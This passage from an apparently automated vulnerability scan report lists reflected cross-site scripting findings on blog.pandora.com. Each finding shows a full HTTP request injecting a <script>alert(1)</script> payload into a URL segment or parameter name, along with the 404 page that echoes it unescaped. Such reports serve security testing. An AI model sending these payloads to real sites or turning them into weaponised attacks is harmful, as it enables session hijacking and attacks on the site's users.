GET /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0467<script>alert(1)</script>c653de1c429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc949<script>alert(1)</script>5818dec138e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cecee<script>alert(1)</script>65ebaa61d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>50186e33060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 795e1<script>alert(1)</script>4beca333580 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc6a7<script>alert(1)</script>380f8df8738 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 893eb<script>alert(1)</script>a835002da8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a128f<script>alert(1)</script>9b5600a0222 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa26<script>alert(1)</script>ccd92788417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb0a1<script>alert(1)</script>2021562e58c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2316c<script>alert(1)</script>13ece1ff165 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da3b3<script>alert(1)</script>63dacbe980f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3aeff<script>alert(1)</script>0e35543ed97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9922b<script>alert(1)</script>9d05ca919c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7cce4<script>alert(1)</script>41d4a417f15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0096<script>alert(1)</script>86b16cd0066 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 was not found on this server.</p> ...[SNIP]...
1.428. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.pandora.com
Path:
/pandora/assets_c/2010/11/North
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload def5f<script>alert(1)</script>cbc7e5829ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 357
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75284<script>alert(1)</script>22efa64e34f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e532<script>alert(1)</script>7e0d5f16878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
